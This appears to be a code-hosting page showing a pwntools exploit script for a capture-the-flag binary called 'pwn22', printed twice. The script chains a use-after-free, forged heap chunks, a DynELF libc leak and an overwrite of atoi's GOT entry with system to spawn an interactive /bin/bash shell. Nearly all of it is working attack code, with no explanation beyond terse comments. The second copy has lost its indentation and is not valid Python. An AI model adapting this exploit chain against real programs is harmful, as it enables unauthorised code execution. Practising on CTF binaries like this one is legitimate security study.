imoldman · September 6, 2018 12:50
diff --git a/pwn22_exp.py b/pwn22_exp.py
 # user (0x130, 0x128)
 #   [0, 8) name_p (size <= 0x1000)
 #   [8, 0x10) age
 #   [0x10, 0x110) description
 #   [0x110, 0x118) link_message_head
 #   [0x118, 0x120) friend
 #   [0x120, 0x128) valid or not

 # message (0x20, 0x18)
 #   [0, 8) title_p (string_size+1 <= 0x1000)           
 #   [8, 0x10) content_p (content_size+1 <= 0x1000)
 #   [0x10, 0x18) next_message_p


 #    register_user * 1
 # -> login: user_0
 # -> add_friend: user_0.friend = user_0
 # -> delete_friend: user_0 (free self)
 # -> show_profile (get current_name)
 # -> send_message (to self, use current_name as name) (eat -0x10 ~ 0x10, name=current_name (0x10 ~ 0x30), content_length >=0x128)
 # -> send_message (to self, use current_name as name) (eat 0x30 ~ 0x50)

 # while DynELF:
 #   -> edit_profile (description = fake_current_name_chunk + fake_message_chunk) (second_message_address + p64(0x21) + current_name + padding + p64(0x21) + any_address)
 #   -> show_message (leak *any_address)

 # -> lookup('system', 'libc')
 # -> lookup('atoi', 'libc')
 # -> logout

 # -> regitser_user * 2      # 1, 2
 # -> login: user_2
 # -> add_friend: user_2.friend = user_2
 # -> delete_friend: user_2 (free self)
 # -> logout()

 # -> register: 0x128, atoi_got  (write user_2 memory, make name_p = atoi_got)
 # -> login: atoi_address
 # -> edit_profile (name = system_address)
 # -> send: /bin/bash


 from pwn import *

 p = process('/home/qs/wangdingbei/pwn22')

 def next():
  p.recvuntil('Your choice:')

 def register(name_size, name):
  p.sendline('2')
  p.sendlineafter('name size:', str(name_size))
  p.sendafter('name:', name)
  p.sendlineafter('age:', '42')
  p.sendafter('description:', 'A')
  next()

 def login(name):
  p.sendline('1')
  p.sendafter('name:', name)
  next()

 def add_friend(name):
  p.sendline('3')
  p.sendafter('name:', name)
  p.sendlineafter('(a/d)', 'a')
  next()

 def delete_friend(name):
  p.sendline('3')
  p.sendafter('name:', name)
  p.sendlineafter('(a/d)', 'd')
  next()

 def show_profile_get_username():
  p.sendline('1')
  p.recvuntil('Username:')
  content = p.recvuntil('\nAge:', drop=True)
  next()
  return content

 def show_profile_get_description():
  p.sendline('1')
  p.recvuntil('Description:')
  content = p.recvuntil('\n1.view profile', drop=True)
  next()
  return content

 def send_message(name, title, content):
  p.sendline('4')
  p.sendafter('to:', name)
  p.sendafter('title:', title)
  p.sendafter('content:', content)
  next()

 def show_message():
  p.sendline('5')
  p.recvuntil('Message 2')
  p.recvuntil('Title:')
  content = p.recvuntil('\nContent:', drop=True)
  next()
  return content

 def edit_profile(name, age_str, description):
  p.sendline('2')
  p.sendafter('name:', name)
  p.sendlineafter('age:', age_str)
  p.sendafter('description:', description)
  next()

 def logout():
  p.sendline('6')
  next()


 context(log_level='debug')
 register(2, '0\0')
 login('0\0')
 add_friend('0\0')
 delete_friend('0\0')
 cur_name = show_profile_get_username()
 send_message(cur_name+'\0', cur_name, 'B'*0x128)
 send_message(cur_name+'\0', 'A', 'B')
 second_message_address = u64(show_profile_get_description().ljust(8, '\0'))

 def leak(address):
  payload = p64(second_message_address) + p64(0x21) + cur_name
  payload += 'A' * (0x28 - len(payload))
  payload += p64(0x21) + p64(address) + p64(address) + p64(0)
  edit_profile(cur_name, str(second_message_address), payload)
  content = show_message() + '\0'
  print '{} => {}'.format(hex(address), repr(content))
  return content

 context(log_level='info')
 d = DynELF(leak, elf=ELF('/home/qs/wangdingbei/pwn22'))
 system_address = d.lookup('system', 'libc')
 atoi_address = d.lookup('atoi', 'libc')
 logout()

 context(log_level='debug')
 register(2, '1\0')
 register(2, '2\0')
 login('2\0')
 add_friend('2\0')
 delete_friend('2\0')
 logout()

 atoi_got = 0x602060
 register(0x128, p64(atoi_got))
 login(p64(atoi_address))
 edit_profile(p64(system_address), '42', 'A')
 p.sendline('/bin/bash\0')
 p.interactive()
	# user (0x130, 0x128)
	# [0, 8) name_p (size <= 0x1000)
	# [8, 0x10) age
	# [0x10, 0x110) description
	# [0x110, 0x118) link_message_head
	# [0x118, 0x120) friend
	# [0x120, 0x128) valid or not

	# message (0x20, 0x18)
	# [0, 8) title_p (string_size+1 <= 0x1000)
	# [8, 0x10) content_p (content_size+1 <= 0x1000)
	# [0x10, 0x18) next_message_p


	# register_user * 1
	# -> login: user_0
	# -> add_friend: user_0.friend = user_0
	# -> delete_friend: user_0 (free self)
	# -> show_profile (get current_name)
	# -> send_message (to self, use current_name as name) (eat -0x10 ~ 0x10, name=current_name (0x10 ~ 0x30), content_length >=0x128)
	# -> send_message (to self, use current_name as name) (eat 0x30 ~ 0x50)

	# while DynELF:
	# -> edit_profile (description = fake_current_name_chunk + fake_message_chunk) (second_message_address + p64(0x21) + current_name + padding + p64(0x21) + any_address)
	# -> show_message (leak *any_address)

	# -> lookup('system', 'libc')
	# -> lookup('atoi', 'libc')
	# -> logout

	# -> regitser_user * 2 # 1, 2
	# -> login: user_2
	# -> add_friend: user_2.friend = user_2
	# -> delete_friend: user_2 (free self)
	# -> logout()

	# -> register: 0x128, atoi_got (write user_2 memory, make name_p = atoi_got)
	# -> login: atoi_address
	# -> edit_profile (name = system_address)
	# -> send: /bin/bash


	from pwn import *

	p = process('/home/qs/wangdingbei/pwn22')

	def next():
	p.recvuntil('Your choice:')

	def register(name_size, name):
	p.sendline('2')
	p.sendlineafter('name size:', str(name_size))
	p.sendafter('name:', name)
	p.sendlineafter('age:', '42')
	p.sendafter('description:', 'A')
	next()

	def login(name):
	p.sendline('1')
	p.sendafter('name:', name)
	next()

	def add_friend(name):
	p.sendline('3')
	p.sendafter('name:', name)
	p.sendlineafter('(a/d)', 'a')
	next()

	def delete_friend(name):
	p.sendline('3')
	p.sendafter('name:', name)
	p.sendlineafter('(a/d)', 'd')
	next()

	def show_profile_get_username():
	p.sendline('1')
	p.recvuntil('Username:')
	content = p.recvuntil('\nAge:', drop=True)
	next()
	return content

	def show_profile_get_description():
	p.sendline('1')
	p.recvuntil('Description:')
	content = p.recvuntil('\n1.view profile', drop=True)
	next()
	return content

	def send_message(name, title, content):
	p.sendline('4')
	p.sendafter('to:', name)
	p.sendafter('title:', title)
	p.sendafter('content:', content)
	next()

	def show_message():
	p.sendline('5')
	p.recvuntil('Message 2')
	p.recvuntil('Title:')
	content = p.recvuntil('\nContent:', drop=True)
	next()
	return content

	def edit_profile(name, age_str, description):
	p.sendline('2')
	p.sendafter('name:', name)
	p.sendlineafter('age:', age_str)
	p.sendafter('description:', description)
	next()

	def logout():
	p.sendline('6')
	next()


	context(log_level='debug')
	register(2, '0\0')
	login('0\0')
	add_friend('0\0')
	delete_friend('0\0')
	cur_name = show_profile_get_username()
	send_message(cur_name+'\0', cur_name, 'B'*0x128)
	send_message(cur_name+'\0', 'A', 'B')
	second_message_address = u64(show_profile_get_description().ljust(8, '\0'))

	def leak(address):
	payload = p64(second_message_address) + p64(0x21) + cur_name
	payload += 'A' * (0x28 - len(payload))
	payload += p64(0x21) + p64(address) + p64(address) + p64(0)
	edit_profile(cur_name, str(second_message_address), payload)
	content = show_message() + '\0'
	print '{} => {}'.format(hex(address), repr(content))
	return content

	context(log_level='info')
	d = DynELF(leak, elf=ELF('/home/qs/wangdingbei/pwn22'))
	system_address = d.lookup('system', 'libc')
	atoi_address = d.lookup('atoi', 'libc')
	logout()

	context(log_level='debug')
	register(2, '1\0')
	register(2, '2\0')
	login('2\0')
	add_friend('2\0')
	delete_friend('2\0')
	logout()

	atoi_got = 0x602060
	register(0x128, p64(atoi_got))
	login(p64(atoi_address))
	edit_profile(p64(system_address), '42', 'A')
	p.sendline('/bin/bash\0')
	p.interactive()